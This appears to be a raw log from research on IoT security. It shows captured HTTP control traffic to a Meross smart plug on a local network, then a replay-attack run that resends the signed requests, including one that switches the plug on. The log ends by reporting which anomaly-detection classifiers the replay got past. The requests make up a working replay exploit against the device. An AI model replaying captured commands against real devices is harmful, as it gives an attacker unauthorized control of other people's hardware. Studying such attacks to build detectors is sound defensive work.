POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 310
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"252ee2a3ba25623da77e67d935596d5e","method":"GET","namespace":"Appliance.System.All","payloadVersion":1,"sign":"0ad441bb176348613552a764389f2f4a","timestamp":1694115879,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"252ee2a3ba25623da77e67d935596d5e","namespace":"Appliance.System.All","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1694115877,"timestampMs":882,"sign":"3747fd27c64bb115e34878ee9dd98f51"},"payload":{"all":{"system":{"hardware":{"type":"mss310h","subType":"it","version":"3.0.0","chipType":"mt7682","uuid":"21012131127760290d3548e1e947c6ee","macAddress":"48:e1:e9:47:c6:ee"},"firmware":{"version":"3.1.1","compileTime":"2020/02/26 09:43:54 GMT +08:00","wifiMac":"2c:33:58:b8:15:96","innerIp":"10.0.0.109","server":"mqtt-eu-3.meross.com","port":443,"userId":2884081},"time":{"timestamp":1694115877,"timezone":"Europe/Rome","timeRule":[[1679792400,7200,1],[1698541200,3600,0],[1711846800,7200,1],[1729990800,3600,0],[1743296400,7200,1],[1761440400,3600,0],[1774746000,7200,1],[1792890000,3600,0],[1806195600,7200,1],[1824944400,3600,0],[1837645200,7200,1],[1856394000,3600,0],[1869094800,7200,1],[1887843600,3600,0],[1901149200,7200,1],[1919293200,3600,0],[1932598800,7200,1],[1950742800,3600,0],[1964048400,7200,1],[1982797200,3600,0]]},"online":{"status":1}},"digest":{"togglex":[{"channel":0,"onoff":0,"lmTime":1694115853}],"triggerx":[],"timerx":[]}}}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"abe72957708f6c6a498c39d45511f4b3","method":"GET","namespace":"Appliance.System.Online","payloadVersion":1,"sign":"4ec4e9fb865ec6419f2e719fbfb4e8cd","timestamp":1694115879,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"abe72957708f6c6a498c39d45511f4b3","namespace":"Appliance.System.Online","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1694115877,"timestampMs":946,"sign":"3d18152bdcbdd8ca6e587c57a0c3267e"},"payload":{"online":{"status":1}}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 348
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"a966ca0154f5f3be0eeeb748b024ecd2","method":"SET","namespace":"Appliance.Control.ToggleX","payloadVersion":1,"sign":"1e0d9e92950d8f94c46e78cc3795942e","timestamp":1694115887,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{"togglex":{"channel":0,"onoff":1}}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"a966ca0154f5f3be0eeeb748b024ecd2","namespace":"Appliance.Control.ToggleX","method":"SETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1694115885,"timestampMs":672,"sign":"8d58b4f9f8fa426aca736f2a987de1d5"},"payload":{}}

START REPLAY ATTACK
#######################################################################################
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 348
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"a966ca0154f5f3be0eeeb748b024ecd2","method":"SET","namespace":"Appliance.Control.ToggleX","payloadVersion":1,"sign":"1e0d9e92950d8f94c46e78cc3795942e","timestamp":1694115887,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{"togglex":{"channel":0,"onoff":1}}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"a966ca0154f5f3be0eeeb748b024ecd2","namespace":"Appliance.Control.ToggleX","method":"SETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1694116032,"timestampMs":527,"sign":"db95bba59d85a59a3d39ffb1e9db908c"},"payload":{}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"abe72957708f6c6a498c39d45511f4b3","method":"GET","namespace":"Appliance.System.Online","payloadVersion":1,"sign":"4ec4e9fb865ec6419f2e719fbfb4e8cd","timestamp":1694115879,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"abe72957708f6c6a498c39d45511f4b3","namespace":"Appliance.System.Online","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1694116032,"timestampMs":535,"sign":"587396471351425ce9ba9ec9e99b3d10"},"payload":{"online":{"status":1}}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 310
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"252ee2a3ba25623da77e67d935596d5e","method":"GET","namespace":"Appliance.System.All","payloadVersion":1,"sign":"0ad441bb176348613552a764389f2f4a","timestamp":1694115879,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"252ee2a3ba25623da77e67d935596d5e","namespace":"Appliance.System.All","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1694116032,"timestampMs":543,"sign":"b8c22509b545c6f3f1fa7579670ec1a0"},"payload":{"all":{"system":{"hardware":{"type":"mss310h","subType":"it","version":"3.0.0","chipType":"mt7682","uuid":"21012131127760290d3548e1e947c6ee","macAddress":"48:e1:e9:47:c6:ee"},"firmware":{"version":"3.1.1","compileTime":"2020/02/26 09:43:54 GMT +08:00","wifiMac":"2c:33:58:b8:15:96","innerIp":"10.0.0.109","server":"mqtt-eu-3.meross.com","port":443,"userId":2884081},"time":{"timestamp":1694116032,"timezone":"Europe/Rome","timeRule":[[1679792400,7200,1],[1698541200,3600,0],[1711846800,7200,1],[1729990800,3600,0],[1743296400,7200,1],[1761440400,3600,0],[1774746000,7200,1],[1792890000,3600,0],[1806195600,7200,1],[1824944400,3600,0],[1837645200,7200,1],[1856394000,3600,0],[1869094800,7200,1],[1887843600,3600,0],[1901149200,7200,1],[1919293200,3600,0],[1932598800,7200,1],[1950742800,3600,0],[1964048400,7200,1],[1982797200,3600,0]]},"online":{"status":1}},"digest":{"togglex":[{"channel":0,"onoff":1,"lmTime":1694116032}],"triggerx":[],"timerx":[]}}}}

****************************************************************
REPLAY ATTACK NOT SUCCESSFUL WITH CLF=OneClassSVM(gamma='auto', nu=0.001)
REPLAY ATTACK SUCCESSFUL WITH CLF=IsolationForest(contamination=0.01)
REPLAY ATTACK SUCCESSFUL WITH CLF=EllipticEnvelope(contamination=0.01)
REPLAY ATTACK SUCCESSFUL WITH CLF=LocalOutlierFactor(contamination=0.01, novelty=True)
REPLAY ATTACK SUCCESSFUL WITH CLF=CustomClassifier()
END REPLAY ATTACK
